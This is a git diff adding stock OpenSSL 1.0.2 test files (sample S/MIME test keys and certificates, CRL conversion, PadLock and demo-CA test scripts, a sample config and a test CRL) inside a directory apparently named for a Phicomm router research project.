+MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDcYC4tS2Uvn1Z2
+iDgtfkJA5tAqgbN6X4yK02RtVH5xekV9+6+eTt/9S+iFAzAnwqR/UB1R67ETrsWq
+V8u9xLg5fHIwIkmu9/6P31UU9cghO7J1lcrhHvooHaFpcXepPWQacpuBq2VvcKRD
+lDfVmdM5z6eS3dSZPTOMMP/xk4nhZB8mcw27qiccPieS0PZ9EZB63T1gmwaK1Rd5
+U94Pl0+zpDqhViuXmBfiIDWjjz0BzHnHSz5Rg4S3oXF1NcojhptIWyI0r7dgn5J3
+NxC4kgKdjzysxo6iWd0nLgz7h0jUdj79EOis4fg9G4f0EFWyQf7iDxGaA93Y9ePB
+Jv5iFZVZAgMBAAECggEBAILIPX856EHb0KclbhlpfY4grFcdg9LS04grrcTISQW1
+J3p9nBpZ+snKe6I8Yx6lf5PiipPsSLlCliHiWpIzJZVQCkAQiSPiHttpEYgP2IYI
+dH8dtznkdVbLRthZs0bnnPmpHCpW+iqpcYJ9eqkz0cvUNUGOjjWmwWmoRqwp/8CW
+3S1qbkQiCh0Mk2fQeGar76R06kXQ9MKDEj14zyS3rJX+cokjEoMSlH8Sbmdh2mJz
+XlNZcvqmeGJZwQWgbVVHOMUuZaKJiFa+lqvOdppbqSx0AsCRq6vjmjEYQEoOefYK
+3IJM9IvqW5UNx0Cy4kQdjhZFFwMO/ALD3QyF21iP4gECgYEA+isQiaWdaY4UYxwK
+Dg+pnSCKD7UGZUaCUIv9ds3CbntMOONFe0FxPsgcc4jRYQYj1rpQiFB8F11+qXGa
+P/IHcnjr2+mTrNY4I9Bt1Lg+pHSS8QCgzeueFybYMLaSsXUo7tGwpvw6UUb6/YWI
+LNCzZbrCLg1KZjGODhhxtvN45ZkCgYEA4YNSe+GMZlxgsvxbLs86WOm6DzJUPvxN
+bWmni0+Oe0cbevgGEUjDVc895uMFnpvlgO49/C0AYJ+VVbStjIMgAeMnWj6OZoSX
+q49rI8KmKUxKgORZiiaMqGWQ7Rxv68+4S8WANsjFxoUrE6dNV3uYDIUsiSLbZeI8
+38KVTcLohcECgYEAiOdyWHGq0G4xl/9rPUCzCMsa4velNV09yYiiwBZgVgfhsawm
+hQpOSBZJA60XMGqkyEkT81VgY4UF4QLLcD0qeCnWoXWVHFvrQyY4RNZDacpl87/t
+QGO2E2NtolL3umesa+2TJ/8Whw46Iu2llSjtVDm9NGiPk5eA7xPPf1iEi9kCgYAb
+0EmVE91wJoaarLtGS7LDkpgrFacEWbPnAbfzW62UENIX2Y1OBm5pH/Vfi7J+vHWS
+8E9e0eIRCL2vY2hgQy/oa67H151SkZnvQ/IP6Ar8Xvd1bDSK8HQ6tMQqKm63Y9g0
+KDjHCP4znOsSMnk8h/bZ3HcAtvbeWwftBR/LBnYNQQKBgA1leIXLLHRoX0VtS/7e
+y7Xmn7gepj+gDbSuCs5wGtgw0RB/1z/S3QoS2TCbZzKPBo20+ivoRP7gcuFhduFR
+hT8V87esr/QzLVpjLedQDW8Xb7GiO3BsU/gVC9VcngenbL7JObl3NgvdreIYo6+n
+yrLyf+8hjm6H6zkjqiOkHAl+
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIDbDCCAlSgAwIBAgIJANk5lu6mSyBBMA0GCSqGSIb3DQEBBQUAMEQxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRUZXN0IFMv
+TUlNRSBSU0EgUm9vdDAeFw0xMzA3MTcxNzI4MzBaFw0yMzA1MjYxNzI4MzBaMEUx
+CzAJBgNVBAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR4wHAYDVQQDDBVU
+ZXN0IFMvTUlNRSBFRSBSU0EgIzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQDcYC4tS2Uvn1Z2iDgtfkJA5tAqgbN6X4yK02RtVH5xekV9+6+eTt/9S+iF
+AzAnwqR/UB1R67ETrsWqV8u9xLg5fHIwIkmu9/6P31UU9cghO7J1lcrhHvooHaFp
+cXepPWQacpuBq2VvcKRDlDfVmdM5z6eS3dSZPTOMMP/xk4nhZB8mcw27qiccPieS
+0PZ9EZB63T1gmwaK1Rd5U94Pl0+zpDqhViuXmBfiIDWjjz0BzHnHSz5Rg4S3oXF1
+NcojhptIWyI0r7dgn5J3NxC4kgKdjzysxo6iWd0nLgz7h0jUdj79EOis4fg9G4f0
+EFWyQf7iDxGaA93Y9ePBJv5iFZVZAgMBAAGjYDBeMAwGA1UdEwEB/wQCMAAwDgYD
+VR0PAQH/BAQDAgXgMB0GA1UdDgQWBBT0arpyYMHXDPVL7MvzE+lx71L7sjAfBgNV
+HSMEGDAWgBTJkVMKY3sWW4u9RPB2iKkk5uW2bDANBgkqhkiG9w0BAQUFAAOCAQEA
+I8nM42am3aImkZyrw8iGkaGhKyi/dfajSWx6B9izBUh+3FleBnUxxOA+mn7M8C47
+Ne18iaaWK8vEux9KYTIY8BzXQZL1AuZ896cXEc6bGKsME37JSsocfuB5BIGWlYLv
+/ON5/SJ0iVFj4fAp8z7Vn5qxRJj9BhZDxaO1Raa6cz6pm0imJy9v8y01TI6HsK8c
+XJQLs7/U4Qb91K+IDNX/lgW3hzWjifNpIpT5JyY3DUgbkD595LFV5DDMZd0UOqcv
+6cyN42zkX8a0TWr3i5wu7pw4k1oD19RbUyljyleEp0DBauIct4GARdBGgi5y1H2i
+NzYzLAPBkHCMY0Is3KKIBw==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa3.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa3.pem
new file mode 100644
index 0000000..14c27f6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/smime-certs/smrsa3.pem
@@ -0,0 +1,49 @@
+-----BEGIN PRIVATE KEY-----
+MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCyK+BTAOJKJjji
+OhY60NeZjzGGZxEBfCm62n0mwkzusW/V/e63uwj6uOVCFoVBz5doMf3M6QIS2jL3
+Aw6Qs5+vcuLA0gHrqIwjYQz1UZ5ETLKLKbQw6YOIVfsFSTxytUVpfcByrubWiLKX
+63theG1/IVokDK/9/k52Kyt+wcCjuRb7AJQFj2OLDRuWm/gavozkK103gQ+dUq4H
+XamZMtTq1EhQOfc0IUeCOEL6xz4jzlHHfzLdkvb7Enhav2sXDfOmZp/DYf9IqS7l
+vFkkINPVbYFBTexaPZlFwmpGRjkmoyH/w+Jlcpzs+w6p1diWRpaSn62bbkRN49j6
+L2dVb+DfAgMBAAECggEAciwDl6zdVT6g/PbT/+SMA+7qgYHSN+1koEQaJpgjzGEP
+lUUfj8TewCtzXaIoyj9IepBuXryBg6snNXpT/w3bqgYon/7zFBvxkUpDj4A5tvKf
+BuY2fZFlpBvUu1Ju1eKrFCptBBBoA9mc+BUB/ze4ktrAdJFcxZoMlVScjqGB3GdR
+OHw2x9BdWGCJBhiu9VHhAAb/LVWi6xgDumYSWZwN2yovg+7J91t5bsENeBRHycK+
+i5dNFh1umIK9N0SH6bpHPnLHrCRchrQ6ZRRxL4ZBKA9jFRDeI7OOsJuCvhGyJ1se
+snsLjr/Ahg00aiHCcC1SPQ6pmXAVBCG7hf4AX82V4QKBgQDaFDE+Fcpv84mFo4s9
+wn4CZ8ymoNIaf5zPl/gpH7MGots4NT5+Ns+6zzJQ6TEpDjTPx+vDaabP7QGXwVZn
+8NAHYvCQK37b+u9HrOt256YYRDOmnJFSbsJdmqzMEzpTNmQ8GuI37cZCS9CmSMv+
+ab/plcwuv0cJRSC83NN2AFyu1QKBgQDRJzKIBQlpprF9rA0D5ZjLVW4OH18A0Mmm
+oanw7qVutBaM4taFN4M851WnNIROyYIlkk2fNgW57Y4M8LER4zLrjU5HY4lB0BMX
+LQWDbyz4Y7L4lVnnEKfQxWFt9avNZwiCxCxEKy/n/icmVCzc91j9uwKcupdzrN6E
+yzPd1s5y4wKBgQCkJvzmAdsOp9/Fg1RFWcgmIWHvrzBXl+U+ceLveZf1j9K5nYJ7
+2OBGer4iH1XM1I+2M4No5XcWHg3L4FEdDixY0wXHT6Y/CcThS+015Kqmq3fBmyrc
+RNjzQoF9X5/QkSmkAIx1kvpgXtcgw70htRIrToGSUpKzDKDW6NYXhbA+PQKBgDJK
+KH5IJ8E9kYPUMLT1Kc4KVpISvPcnPLVSPdhuqVx69MkfadFSTb4BKbkwiXegQCjk
+isFzbeEM25EE9q6EYKP+sAm+RyyJ6W0zKBY4TynSXyAiWSGUAaXTL+AOqCaVVZiL
+rtEdSUGQ/LzclIT0/HLV2oTw4KWxtTdc3LXEhpNdAoGBAM3LckiHENqtoeK2gVNw
+IPeEuruEqoN4n+XltbEEv6Ymhxrs6T6HSKsEsLhqsUiIvIzH43KMm45SNYTn5eZh
+yzYMXLmervN7c1jJe2Y2MYv6hE+Ypj1xGW4w7s8WNKmVzLv97beisD9AZrS7sXfF
+RvOAi5wVkYylDxV4238MAZIq
+-----END PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIDbDCCAlSgAwIBAgIJANk5lu6mSyBCMA0GCSqGSIb3DQEBBQUAMEQxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR0wGwYDVQQDDBRUZXN0IFMv
+TUlNRSBSU0EgUm9vdDAeFw0xMzA3MTcxNzI4MzBaFw0yMzA1MjYxNzI4MzBaMEUx
+CzAJBgNVBAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMR4wHAYDVQQDDBVU
+ZXN0IFMvTUlNRSBFRSBSU0EgIzMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQCyK+BTAOJKJjjiOhY60NeZjzGGZxEBfCm62n0mwkzusW/V/e63uwj6uOVC
+FoVBz5doMf3M6QIS2jL3Aw6Qs5+vcuLA0gHrqIwjYQz1UZ5ETLKLKbQw6YOIVfsF
+STxytUVpfcByrubWiLKX63theG1/IVokDK/9/k52Kyt+wcCjuRb7AJQFj2OLDRuW
+m/gavozkK103gQ+dUq4HXamZMtTq1EhQOfc0IUeCOEL6xz4jzlHHfzLdkvb7Enha
+v2sXDfOmZp/DYf9IqS7lvFkkINPVbYFBTexaPZlFwmpGRjkmoyH/w+Jlcpzs+w6p
+1diWRpaSn62bbkRN49j6L2dVb+DfAgMBAAGjYDBeMAwGA1UdEwEB/wQCMAAwDgYD
+VR0PAQH/BAQDAgXgMB0GA1UdDgQWBBQ6CkW5sa6HrBsWvuPOvMjyL5AnsDAfBgNV
+HSMEGDAWgBTJkVMKY3sWW4u9RPB2iKkk5uW2bDANBgkqhkiG9w0BAQUFAAOCAQEA
+JhcrD7AKafVzlncA3cZ6epAruj1xwcfiE+EbuAaeWEGjoSltmevcjgoIxvijRVcp
+sCbNmHJZ/siQlqzWjjf3yoERvLDqngJZZpQeocMIbLRQf4wgLAuiBcvT52wTE+sa
+VexeETDy5J1OW3wE4A3rkdBp6hLaymlijFNnd5z/bP6w3AcIMWm45yPm0skM8RVr
+O3UstEFYD/iy+p+Y/YZDoxYQSW5Vl+NkpGmc5bzet8gQz4JeXtH3z5zUGoDM4XK7
+tXP3yUi2eecCbyjh/wgaQiVdylr1Kv3mxXcTl+cFO22asDkh0R/y72nTCu5fSILY
+CscFo2Z2pYROGtZDmYqhRw==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/srptest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/srptest.c
new file mode 120000
index 0000000..9534868
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/srptest.c
@@ -0,0 +1 @@
+../crypto/srp/srptest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ssltest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ssltest.c
new file mode 120000
index 0000000..40191f0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ssltest.c
@@ -0,0 +1 @@
+../ssl/ssltest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tcrl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tcrl
new file mode 100644
index 0000000..1075a4f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tcrl
@@ -0,0 +1,78 @@
+#!/bin/sh
+
+cmd='../util/shlib_wrap.sh ../apps/openssl crl'
+
+if [ "$1"x != "x" ]; then
+	t=$1
+else
+	t=testcrl.pem
+fi
+
+echo testing crl conversions
+cp $t crl-fff.p
+
+echo "p -> d"
+$cmd -in crl-fff.p -inform p -outform d >crl-f.d
+if [ $? != 0 ]; then exit 1; fi
+#echo "p -> t"
+#$cmd -in crl-fff.p -inform p -outform t >crl-f.t
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in crl-fff.p -inform p -outform p >crl-f.p
+if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> d"
+$cmd -in crl-f.d -inform d -outform d >crl-ff.d1
+if [ $? != 0 ]; then exit 1; fi
+#echo "t -> d"
+#$cmd -in crl-f.t -inform t -outform d >crl-ff.d2
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> d"
+$cmd -in crl-f.p -inform p -outform d >crl-ff.d3
+if [ $? != 0 ]; then exit 1; fi
+
+#echo "d -> t"
+#$cmd -in crl-f.d -inform d -outform t >crl-ff.t1
+#if [ $? != 0 ]; then exit 1; fi
+#echo "t -> t"
+#$cmd -in crl-f.t -inform t -outform t >crl-ff.t2
+#if [ $? != 0 ]; then exit 1; fi
+#echo "p -> t"
+#$cmd -in crl-f.p -inform p -outform t >crl-ff.t3
+#if [ $? != 0 ]; then exit 1; fi
+
+echo "d -> p"
+$cmd -in crl-f.d -inform d -outform p >crl-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#echo "t -> p"
+#$cmd -in crl-f.t -inform t -outform p >crl-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+echo "p -> p"
+$cmd -in crl-f.p -inform p -outform p >crl-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+cmp crl-fff.p crl-f.p
+if [ $? != 0 ]; then exit 1; fi
+cmp crl-fff.p crl-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#cmp crl-fff.p crl-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+cmp crl-fff.p crl-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+#cmp crl-f.t crl-ff.t1
+#if [ $? != 0 ]; then exit 1; fi
+#cmp crl-f.t crl-ff.t2
+#if [ $? != 0 ]; then exit 1; fi
+#cmp crl-f.t crl-ff.t3
+#if [ $? != 0 ]; then exit 1; fi
+
+cmp crl-f.p crl-ff.p1
+if [ $? != 0 ]; then exit 1; fi
+#cmp crl-f.p crl-ff.p2
+#if [ $? != 0 ]; then exit 1; fi
+cmp crl-f.p crl-ff.p3
+if [ $? != 0 ]; then exit 1; fi
+
+/bin/rm -f crl-f.* crl-ff.* crl-fff.*
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tcrl.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tcrl.com
new file mode 100644
index 0000000..dd96a2b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/tcrl.com
@@ -0,0 +1,88 @@
+$! TCRL.COM  --  Tests crl keys
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$	if (p2 .eqs. "64") then __arch = __arch+ "_64"
+$!
+$	exe_dir = "sys$disk:[-.''__arch'.exe.apps]"
+$
+$	cmd = "mcr ''exe_dir'openssl crl"
+$
+$	t = "testcrl.pem"
+$	if p1 .nes. "" then t = p1
+$
+$	write sys$output "testing CRL conversions"
+$	if f$search("fff.*") .nes "" then delete fff.*;*
+$	if f$search("ff.*") .nes "" then delete ff.*;*
+$	if f$search("f.*") .nes "" then delete f.*;*
+$	convert/fdl=sys$input: 't' fff.p
+RECORD
+	FORMAT STREAM_LF
+$
+$	write sys$output "p -> d"
+$	'cmd' -in fff.p -inform p -outform d -out f.d
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "p -> t"
+$!	'cmd' -in fff.p -inform p -outform t -out f.t
+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in fff.p -inform p -outform p -out f.p
+$	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> d"
+$	'cmd' -in f.d -inform d -outform d -out ff.d1
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> d"
+$!	'cmd' -in f.t -inform t -outform d -out ff.d2
+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> d"
+$	'cmd' -in f.p -inform p -outform d -out ff.d3
+$	if $severity .ne. 1 then exit 3
+$
+$!	write sys$output "d -> t"
+$!	'cmd' -in f.d -inform d -outform t -out ff.t1
+$!	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> t"
+$!	'cmd' -in f.t -inform t -outform t -out ff.t2
+$!	if $severity .ne. 1 then exit 3
+$!	write sys$output "p -> t"
+$!	'cmd' -in f.p -inform p -outform t -out ff.t3
+$!	if $severity .ne. 1 then exit 3
+$
+$	write sys$output "d -> p"
+$	'cmd' -in f.d -inform d -outform p -out ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	write sys$output "t -> p"
+$!	'cmd' -in f.t -inform t -outform p -out ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	write sys$output "p -> p"
+$	'cmd' -in f.p -inform p -outform p -out ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	backup/compare fff.p f.p
+$	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	backup/compare fff.p ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	backup/compare fff.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$!	backup/compare f.t ff.t1
+$!	if $severity .ne. 1 then exit 3
+$!	backup/compare f.t ff.t2
+$!	if $severity .ne. 1 then exit 3
+$!	backup/compare f.t ff.t3
+$!	if $severity .ne. 1 then exit 3
+$
+$	backup/compare f.p ff.p1
+$	if $severity .ne. 1 then exit 3
+$!	backup/compare f.p ff.p2
+$!	if $severity .ne. 1 then exit 3
+$	backup/compare f.p ff.p3
+$	if $severity .ne. 1 then exit 3
+$
+$	delete f.*;*,ff.*;*,fff.*;*
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/test.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/test.cnf
new file mode 100644
index 0000000..1083444
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/test.cnf
@@ -0,0 +1,88 @@
+#
+# SSLeay example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+
+RANDFILE		= ./.rnd
+
+####################################################################
+[ ca ]
+default_ca	= CA_default		# The default ca section
+
+####################################################################
+[ CA_default ]
+
+dir		= ./demoCA		# Where everything is kept
+certs		= $dir/certs		# Where the issued certs are kept
+crl_dir		= $dir/crl		# Where the issued crl are kept
+database	= $dir/index.txt	# database index file.
+new_certs_dir	= $dir/new_certs	# default place for new certs.
+
+certificate	= $dir/CAcert.pem 	# The CA certificate
+serial		= $dir/serial 		# The current serial number
+crl		= $dir/crl.pem 		# The current CRL
+private_key	= $dir/private/CAkey.pem# The private key
+RANDFILE	= $dir/private/.rand	# private random number file
+
+default_days	= 365			# how long to certify for
+default_crl_days= 30			# how long before next CRL
+default_md	= md5			# which md to use.
+
+# A few difference way of specifying how similar the request should look
+# For type CA, the listed attributes must be the same, and the optional
+# and supplied fields are just that :-)
+policy		= policy_match
+
+# For the CA policy
+[ policy_match ]
+countryName		= match
+stateOrProvinceName	= match
+organizationName	= match
+organizationalUnitName	= optional
+commonName		= supplied
+emailAddress		= optional
+
+# For the 'anything' policy
+# At this point in time, you must list all acceptable 'object'
+# types.
+[ policy_anything ]
+countryName		= optional
+stateOrProvinceName	= optional
+localityName		= optional
+organizationName	= optional
+organizationalUnitName	= optional
+commonName		= supplied
+emailAddress		= optional
+
+####################################################################
+[ req ]
+default_bits		= 1024
+default_keyfile 	= testkey.pem
+distinguished_name	= req_distinguished_name
+encrypt_rsa_key		= no
+
+[ req_distinguished_name ]
+countryName			= Country Name (2 letter code)
+countryName_default		= AU
+countryName_value		= AU
+
+stateOrProvinceName		= State or Province Name (full name)
+stateOrProvinceName_default	= Queensland
+stateOrProvinceName_value	=
+
+localityName			= Locality Name (eg, city)
+localityName_value		= Brisbane
+
+organizationName		= Organization Name (eg, company)
+organizationName_default	= 
+organizationName_value		= CryptSoft Pty Ltd
+
+organizationalUnitName		= Organizational Unit Name (eg, section)
+organizationalUnitName_default	=
+organizationalUnitName_value	= .
+
+commonName			= Common Name (eg, YOUR name)
+commonName_value		= Eric Young
+
+emailAddress			= Email Address
+emailAddress_value		= eay@mincom.oz.au
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/test_padlock b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/test_padlock
new file mode 100755
index 0000000..5c0f210
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/test_padlock
@@ -0,0 +1,64 @@
+#!/bin/sh
+
+PROG=$1
+
+if [ -x $PROG ]; then
+    if expr "x`$PROG version`" : "xOpenSSL" > /dev/null; then
+	:
+    else
+	echo "$PROG is not OpenSSL executable"
+	exit 1
+    fi
+else
+    echo "$PROG is not executable"
+    exit 1;
+fi
+
+if $PROG engine padlock | grep -v no-ACE; then
+
+    HASH=`cat $PROG | $PROG dgst -hex`
+
+    ACE_ALGS="	aes-128-ecb aes-192-ecb aes-256-ecb \
+		aes-128-cbc aes-192-cbc aes-256-cbc \
+		aes-128-cfb aes-192-cfb aes-256-cfb \
+		aes-128-ofb aes-192-ofb aes-256-ofb"
+
+    nerr=0
+
+    for alg in $ACE_ALGS; do
+	echo $alg
+	TEST=`(	cat $PROG | \
+		$PROG enc -e -k "$HASH" -$alg -bufsize 999 -engine padlock | \
+		$PROG enc -d -k "$HASH" -$alg | \
+		$PROG dgst -hex ) 2>/dev/null`
+	if [ "$TEST" != "$HASH" ]; then
+		echo "-$alg encrypt test failed"
+		nerr=`expr $nerr + 1`
+	fi
+	TEST=`(	cat $PROG | \
+		$PROG enc -e -k "$HASH" -$alg | \
+		$PROG enc -d -k "$HASH" -$alg -bufsize 999 -engine padlock | \
+		$PROG dgst -hex ) 2>/dev/null`
+	if [ "$TEST" != "$HASH" ]; then
+		echo "-$alg decrypt test failed"
+		nerr=`expr $nerr + 1`
+	fi
+	TEST=`(	cat $PROG | \
+		$PROG enc -e -k "$HASH" -$alg -engine padlock | \
+		$PROG enc -d -k "$HASH" -$alg -engine padlock | \
+		$PROG dgst -hex ) 2>/dev/null`
+	if [ "$TEST" != "$HASH" ]; then
+		echo "-$alg en/decrypt test failed"
+		nerr=`expr $nerr + 1`
+	fi
+    done
+
+    if [ $nerr -gt 0 ]; then
+	echo "PadLock ACE test failed."
+	exit 1;
+    fi
+else
+    echo "PadLock ACE is not available"
+fi
+
+exit 0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testca b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testca
new file mode 100644
index 0000000..b109cfe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testca
@@ -0,0 +1,51 @@
+#!/bin/sh
+
+SH="/bin/sh"
+if test "$OSTYPE" = msdosdjgpp; then
+    PATH="../apps\;$PATH"
+else
+    PATH="../apps:$PATH"
+fi
+export SH PATH
+
+SSLEAY_CONFIG="-config CAss.cnf"
+export SSLEAY_CONFIG
+
+OPENSSL="`pwd`/../util/opensslwrap.sh"
+export OPENSSL
+
+/bin/rm -fr demoCA
+$SH ../apps/CA.sh -newca <<EOF
+EOF
+
+if [ $? != 0 ]; then
+	exit 1;
+fi
+
+SSLEAY_CONFIG="-config Uss.cnf"
+export SSLEAY_CONFIG
+$SH ../apps/CA.sh -newreq
+if [ $? != 0 ]; then
+	exit 1;
+fi
+
+
+SSLEAY_CONFIG="-config ../apps/openssl.cnf"
+export SSLEAY_CONFIG
+$SH ../apps/CA.sh -sign  <<EOF
+y
+y
+EOF
+if [ $? != 0 ]; then
+	exit 1;
+fi
+
+
+$SH ../apps/CA.sh -verify newcert.pem
+if [ $? != 0 ]; then
+	exit 1;
+fi
+
+/bin/rm -fr demoCA newcert.pem newreq.pem
+#usage: CA -newcert|-newreq|-newca|-sign|-verify
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testca.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testca.com
new file mode 100644
index 0000000..78cda9e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testca.com
@@ -0,0 +1,52 @@
+$! TESTCA.COM
+$
+$	__arch = "VAX"
+$	if f$getsyi("cpu") .ge. 128 then -
+	   __arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$	if __arch .eqs. "" then __arch = "UNK"
+$!
+$       if (p1 .eqs. "64") then __arch = __arch+ "_64"
+$
+$	openssl = "mcr ''exe_dir'openssl"
+$
+$	SSLEAY_CONFIG="-config ""CAss.cnf"""
+$
+$	set noon
+$	if f$search("demoCA.dir") .nes. ""
+$	then
+$	    @[-.util]deltree [.demoCA]*.*
+$	    set file/prot=(S:RWED,O:RWED,G:RWED,W:RWED) demoCA.dir;*
+$	    delete demoCA.dir;*
+$	endif
+$	set on
+$	open/read sys$ca_input VMSca-response.1
+$	@[-.apps]CA.com -input sys$ca_input -newca
+$	close sys$ca_input
+$	if $severity .ne. 1 then exit 3
+$
+$
+$	SSLEAY_CONFIG="-config ""Uss.cnf"""
+$	@[-.apps]CA.com -newreq
+$	if $severity .ne. 1 then exit 3
+$
+$
+$	SSLEAY_CONFIG="-config [-.apps]openssl-vms.cnf"
+$	open/read sys$ca_input VMSca-response.2
+$	@[-.apps]CA.com -input sys$ca_input -sign
+$	close sys$ca_input
+$	if $severity .ne. 1 then exit 3
+$
+$
+$	@[-.apps]CA.com -verify newcert.pem
+$	if $severity .ne. 1 then exit 3
+$
+$	set noon
+$	@[-.util]deltree [.demoCA]*.*
+$	set file/prot=(S:RWED,O:RWED,G:RWED,W:RWED) demoCA.dir;*
+$	delete demoCA.dir;*
+$	if f$search("newcert.pem") .nes. "" then delete newcert.pem;*
+$	if f$search("newcert.pem") .nes. "" then delete newreq.pem;*
+$	set on
+$!	#usage: CA -newcert|-newreq|-newca|-sign|-verify
+$
+$	exit
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testcrl.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testcrl.pem
new file mode 100644
index 0000000..0989788
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/testcrl.pem
@@ -0,0 +1,16 @@
+-----BEGIN X509 CRL-----
+MIICjTCCAfowDQYJKoZIhvcNAQECBQAwXzELMAkGA1UEBhMCVVMxIDAeBgNVBAoT
+F1JTQSBEYXRhIFNlY3VyaXR5LCBJbmMuMS4wLAYDVQQLEyVTZWN1cmUgU2VydmVy
+IENlcnRpZmljYXRpb24gQXV0aG9yaXR5Fw05NTA1MDIwMjEyMjZaFw05NTA2MDEw
+MDAxNDlaMIIBaDAWAgUCQQAABBcNOTUwMjAxMTcyNDI2WjAWAgUCQQAACRcNOTUw
+MjEwMDIxNjM5WjAWAgUCQQAADxcNOTUwMjI0MDAxMjQ5WjAWAgUCQQAADBcNOTUw
+MjI1MDA0NjQ0WjAWAgUCQQAAGxcNOTUwMzEzMTg0MDQ5WjAWAgUCQQAAFhcNOTUw
+MzE1MTkxNjU0WjAWAgUCQQAAGhcNOTUwMzE1MTk0MDQxWjAWAgUCQQAAHxcNOTUw
+MzI0MTk0NDMzWjAWAgUCcgAABRcNOTUwMzI5MjAwNzExWjAWAgUCcgAAERcNOTUw
+MzMwMDIzNDI2WjAWAgUCQQAAIBcNOTUwNDA3MDExMzIxWjAWAgUCcgAAHhcNOTUw
+NDA4MDAwMjU5WjAWAgUCcgAAQRcNOTUwNDI4MTcxNzI0WjAWAgUCcgAAOBcNOTUw
+NDI4MTcyNzIxWjAWAgUCcgAATBcNOTUwNTAyMDIxMjI2WjANBgkqhkiG9w0BAQIF
+AAN+AHqOEJXSDejYy0UwxxrH/9+N2z5xu/if0J6qQmK92W0hW158wpJg+ovV3+wQ
+wvIEPRL2rocL0tKfAsVq1IawSJzSNgxG0lrcla3MrJBnZ4GaZDu4FutZh72MR3Gt
+JaAL3iTJHJD55kK2D/VoyY1djlsPuNh6AEgdVwFAyp0v
+-----END X509 CRL-----
